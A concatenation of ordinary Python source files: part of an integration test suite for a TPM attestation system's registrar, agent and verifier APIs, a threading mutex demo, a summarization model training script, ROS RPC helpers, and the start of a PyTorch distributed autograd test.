'auth_tag': crypto.do_hmac(key, tenant_templ.agent_uuid),
}
test_011_reg_agent_activate_put = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_011_reg_agent_activate_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}/activate',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Activate return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_013_reg_agents_get(self):
"""Test registrar's GET /v2/agents Interface"""
test_013_reg_agents_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_013_reg_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# We registered exactly one agent so far
self.assertEqual(1, len(json_response["results"]["uuids"]), "Incorrect system state!")
def test_014_reg_agent_get(self):
"""Test registrar's GET /v2/agents/{UUID} Interface"""
test_014_reg_agent_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_014_reg_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("ek_tpm", json_response["results"], "Malformed response body!")
self.assertIn("aik_tpm", json_response["results"], "Malformed response body!")
self.assertIn("ekcert", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
global aik_tpm
aik_tpm = json_response["results"]["aik_tpm"]
def test_015_reg_agent_delete(self):
"""Test registrar's DELETE /v2/agents/{UUID} Interface"""
test_015_reg_agent_delete = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_015_reg_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Agent Setup Testset
def test_020_agent_keys_pubkey_get(self):
"""Test agent's GET /v2/keys/pubkey Interface"""
# We want a real cloud agent to communicate with!
launch_cloudagent()
time.sleep(10)
test_020_agent_keys_pubkey_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_020_agent_keys_pubkey_get.get(
f'/v{self.api_version}/keys/pubkey',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent pubkey return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
global public_key
public_key = json_response["results"]["pubkey"]
self.assertNotEqual(public_key, None, "Malformed response body!")
def test_021_reg_agent_get(self):
# We need to refresh the aik value we've stored in case it changed
self.test_014_reg_agent_get()
def test_022_agent_quotes_identity_get(self):
"""Test agent's GET /v2/quotes/identity Interface"""
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
numretries = config.getint('tenant', 'max_retries')
while numretries >= 0:
test_022_agent_quotes_identity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_022_agent_quotes_identity_get.get(
f'/v{self.api_version}/quotes/identity?nonce={nonce}',
data=None,
cert="",
verify=False
)
if response.status_code == 200:
break
numretries -= 1
time.sleep(config.getint('tenant', 'retry_interval'))
self.assertEqual(response.status_code, 200, "Non-successful Agent identity return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
# Check the quote identity
self.assertTrue(tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
json_response["results"]["pubkey"],
json_response["results"]["quote"],
aik_tpm,
hash_alg=json_response["results"]["hash_alg"]),
"Invalid quote!")
@unittest.skip("Testing of agent's POST /v2/keys/vkey disabled! (spawned CV should do this already)")
def test_023_agent_keys_vkey_post(self):
"""Test agent's POST /v2/keys/vkey Interface"""
# CV should do this (during CV POST/PUT test)
# Running this test might hide problems with the CV sending the V key
global public_key
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
encrypted_V = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), str(self.V))
b64_encrypted_V = base64.b64encode(encrypted_V)
data = {'encrypted_key': b64_encrypted_V}
test_023_agent_keys_vkey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_023_agent_keys_vkey_post.post(
f'/v{self.api_version}/keys/vkey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent vkey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_024_agent_keys_ukey_post(self):
"""Test agents's POST /v2/keys/ukey Interface"""
global public_key
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.U, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.auth_tag, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.payload, "Required value not set. Previous step may have failed?")
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), self.U)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'auth_tag': self.auth_tag,
'payload': self.payload
}
test_024_agent_keys_ukey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_024_agent_keys_ukey_post.post(
f'/v{self.api_version}/keys/ukey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent ukey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_025_cv_allowlist_post(self):
"""Test CV's POST /v2/allowlist/{name} Interface"""
data = {
'name': 'test-allowlist',
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'ima_policy': json.dumps(self.allowlist),
}
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.post(
'/allowlists/test-allowlist',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 201, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_026_cv_allowlist_get(self):
"""Test CV's GET /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.get(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
results = json_response['results']
self.assertEqual(results['name'], 'test-allowlist')
self.assertEqual(results['tpm_policy'], json.dumps(self.tpm_policy))
self.assertEqual(results['vtpm_policy'], json.dumps(self.vtpm_policy))
self.assertEqual(results['ima_policy'], json.dumps(self.allowlist))
def test_027_cv_allowlist_delete(self):
"""Test CV's DELETE /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.delete(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 204, "Non-successful CV allowlist Delete return code!")
# Cloud Verifier Testset
def test_030_cv_agent_post(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
data = {
'v': b64_v,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(self.allowlist),
'ima_sign_verification_keys': '',
'mb_refstate': None,
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
test_030_cv_agent_post = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_030_cv_agent_post.post(
f'/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
time.sleep(10)
@unittest.skip("Testing of CV's PUT /v2/agents/{UUID} disabled!")
def test_031_cv_agent_put(self):
"""Test CV's PUT /v2/agents/{UUID} Interface"""
# TODO: this should actually test PUT functionality (e.g., make agent fail and then PUT back up)
test_031_cv_agent_put = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_031_cv_agent_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=b'',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_032_cv_agents_get(self):
"""Test CV's GET /v2/agents Interface"""
test_032_cv_agents_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_032_cv_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# Be sure our agent is registered
self.assertEqual(1, len(json_response["results"]["uuids"]))
def test_033_cv_agent_get(self):
"""Test CV's GET /v2/agents/{UUID} Interface"""
test_033_cv_agent_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_033_cv_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Check a few of the important properties are present
self.assertIn("operational_state", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
def test_034_cv_agent_post_invalid_exclude_list(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
# Set unsupported regex in exclude list
allowlist = {'exclude': ['*']}
data = {
'v': b64_v,
'mb_refstate': None,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(allowlist),
'ima_sign_verification_keys': '',
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = client.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
data=json.dumps(data),
verify=False
)
self.assertEqual(response.status_code, 400, "Successful CV agent Post return code!")
# Ensure response is well-formed
json_response = response.json()
self.assertIn("results", json_response, "Malformed response body!")
# Agent Poll Testset
def test_040_agent_quotes_integrity_get(self):
"""Test agent's GET /v2/quotes/integrity Interface"""
global public_key
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
mask = self.tpm_policy["mask"]
vmask = self.vtpm_policy["mask"]
partial = "1"
if public_key is None:
partial = "0"
test_040_agent_quotes_integrity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_040_agent_quotes_integrity_get.get(
f'/v{self.api_version}/quotes/integrity?nonce={nonce}&mask={mask}&vmask={vmask}&partial={partial}',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent Integrity Get return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
if public_key is None:
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
public_key = json_response["results"]["pubkey"]
self.assertIn("hash_alg", json_response["results"], "Malformed response body!")
quote = json_response["results"]["quote"]
hash_alg = json_response["results"]["hash_alg"]
validQuote = tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
public_key,
quote,
aik_tpm,
self.tpm_policy,
hash_alg=hash_alg)
self.assertTrue(validQuote)
async def test_041_agent_keys_verify_get(self):
"""Test agent's GET /v2/keys/verify Interface
We use async here to allow function await while key processes"""
self.assertIsNotNone(self.K, "Required value not set. Previous step may have failed?")
challenge = tpm_abstract.TPM_Utilities.random_password(20)
encoded = base64.b64encode(self.K).decode('utf-8')
response = tornado_requests.request("GET",
"http://%s:%s/keys/verify?challenge=%s" % (self.cloudagent_ip, self.cloudagent_port, challenge))
response = await response
self.assertEqual(response.status, 200, "Non-successful Agent verify return code!")
json_response = json.loads(response.read().decode())
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("hmac", json_response["results"], "Malformed response body!")
# Be sure response is valid
mac = json_response['results']['hmac']
ex_mac = crypto.do_hmac(encoded, challenge)
# ex_mac = crypto.do_hmac(self.K, challenge)
self.assertEqual(mac, ex_mac, "Agent failed to validate challenge code!")
# CV Cleanup Testset
def test_050_cv_agent_delete(self):
"""Test CV's DELETE /v2/agents/{UUID} Interface"""
time.sleep(5)
test_050_cv_agent_delete = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_050_cv_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 202, "Non-successful CV agent Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def tearDown(self):
"""Nothing to bring down after each test"""
return
@classmethod
def tearDownClass(cls):
"""Nothing to bring down"""
return
if __name__ == '__main__':
unittest.main()
|
mutex.py
|
import time
from threading import Thread, Lock
mutex = Lock()
def foo(id):
mutex.acquire() # comment out this line of code to test what happens without the mutex
for _ in range(100):
print("Thread id:", id)
time.sleep(0.05)
mutex.release() # comment out this line of code to test what happens without the mutex
if __name__ == "__main__":
print("MAIN FUNCTION STARTS")
threads = []
for i in range(4):
threads.append(Thread(target=foo, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print("THE END")
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
print(device_id)
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(args.model_path))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
validate(args, device_id, cp, 1000)
test_ext(args, device_id, cp, 1000)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
|
pal_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pal_python: pal_rpc.py
#
# Copyright (c) 2014 PAL Robotics SL. All Rights Reserved
#
# Permission to use, copy, modify, and/or distribute this software for
# any purpose with or without fee is hereby granted, provided that the
# above copyright notice and this permission notice appear in all
# copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Authors:
# * Paul Mathieu
import threading
import rospy
import actionlib
class EasyActionServer:
"""
Supposedly easier to use than the SimpleActionServer.
This action server will replace ROS services. It provides a
simplistic asynchronous RPC call interface with single goal.
The cancel callback can be optionaly specified to allow for interruptible
actions.
Intended use:
def ac_cb(goal):
print("received a goal: {}".format(goal))
EasyActionServer("/foo_action", foo.msg.FooAction, ac_cb)
"""
def __init__(self, ac_name, ac_type, cb, immediate_success=True):
""" If immediate_success is False, the user will have to call reply()
to set_succeeded() the goal. Otherwise, the goal will be automatically
set to succeeded after the callback return. """
self._cb = cb
self._opt_cancel_cb = None
self._ghdl = None
self._immed = immediate_success
self._ac = actionlib.ActionServer(ac_name, ac_type, auto_start=False,
goal_cb=self._goal_cb,
cancel_cb=self._cancel_cb)
self._ac.start()
def reply(self, result=None):
""" Only useful if `immediate_success=False` was given to the
constructor. Will mark the action as succeeded. """
if self._immed:
rospy.logwarn("EasyActionServer.reply() has no "
"effect if initialized with immediate_success=True")
return
if self._ghdl is not None: # goal has not been canceled or pre-empted
self._succeed(result)
def set_cancel_cb(self, cancel_cb):
""" Only useful if `immediate_success=False` was given to the
constructor (otherwise the action will immediately succeed). Will
register an optional cancel callback. """
if self._immed:
rospy.logwarn("EasyActionServer.set_cancel_cb() has no "
"effect if initialized with immediate_success=True")
return
self._opt_cancel_cb = cancel_cb
def _succeed(self, result=None):
if self._ghdl is None:
rospy.logerr("trying to succeed on an invalid goal handle")
return
self._ghdl.set_succeeded(result)
self._ghdl = None
def _goal_cb(self, ghdl):
if self._ghdl is not None:
self._ghdl.set_aborted()
self._ghdl = ghdl
self._ghdl.set_accepted()
self._cb(ghdl.get_goal())
if self._immed:
self._succeed()
def _cancel_cb(self, ghdl):
if ghdl != self._ghdl:
rospy.logerr("trying to cancel an invalid goal handle")
return
self._cancel()
if self._opt_cancel_cb is not None:
self._opt_cancel_cb()
def _cancel(self):
if self._ghdl is None:
rospy.logerr("trying to cancel an invalid goal handle")
return
self._ghdl.set_canceled()
self._ghdl = None
class AsyncServiceClient:
"""
Simple non-blocking service client.
Intended use:
srv_cl = AsyncServiceClient("/foo", foo.srv.Foo)
req = foo.srv.FooRequest()
req.bar = "baz"
srv_cl.call(req)
If you want to use the result:
def callback(result):
rospy.loginfo(result)
srv_cl.call(req, cb=callback)
Note that the callback (if not None) will be called from within a worker
thread. If the service is not available, or there is some error, the callback
won't be called.
"""
def __init__(self, srv_name, srv_type, persistent=False):
self._online = False
self._srv_name = srv_name
self._srv_type = srv_type
self._request = None
self._wakeup = threading.Condition()
threading.Thread(target=self._register_proxy,
args=[persistent]).start()
threading.Thread(target=self._worker).start()
def call(self, *args, **kwargs):
""" Asynchronously send a request to the service provider.
Usage:
call(*args, cb=None)
Returns False if the service is not available. Otherwise, if `cb'
is not None and there is no error, it'll be called with the result.
"""
if kwargs and kwargs.keys() != ['cb']:
raise ValueError('The only valid keyword argument is "cb".')
cb = kwargs.get('cb', None)
if self._online:
with self._wakeup:
self._request = (args, cb)
self._wakeup.notify_all()
return True
return False
def _register_proxy(self, persistent):
try:
rospy.wait_for_service(self._srv_name)
self._srvc = rospy.ServiceProxy(self._srv_name, self._srv_type,
persistent)
self._online = True
except rospy.ServiceException as e:
rospy.logerr("registering service {} failed: {}"
.format(self._srv_name, e))
except rospy.ROSInterruptException:
pass
def _worker(self):
while not rospy.is_shutdown():
if self._request is None:
with self._wakeup:
self._wakeup.wait(1.0)
continue
req, cb = self._request
self._request = None
try:
result = self._call_service(*req) # ones are in the queue
if cb:
cb(result)
except rospy.ROSInterruptException:
break
def _call_service(self, *args):
try:
return self._srvc(*args)
except rospy.ServiceException as e:
rospy.logerr("service call to {} failed: {}"
.format(self._srv_name, e))
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.testing._internal.common_utils import IS_MACOS
import torch.testing._internal.dist_utils as dist_utils
from torch.testing._internal.dist_utils import (
dist_init,
get_shutdown_error_regex,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor():
# type: () -> Tensor
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1, t2):
# type: (RRef[Tensor], Tensor) -> Tensor
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
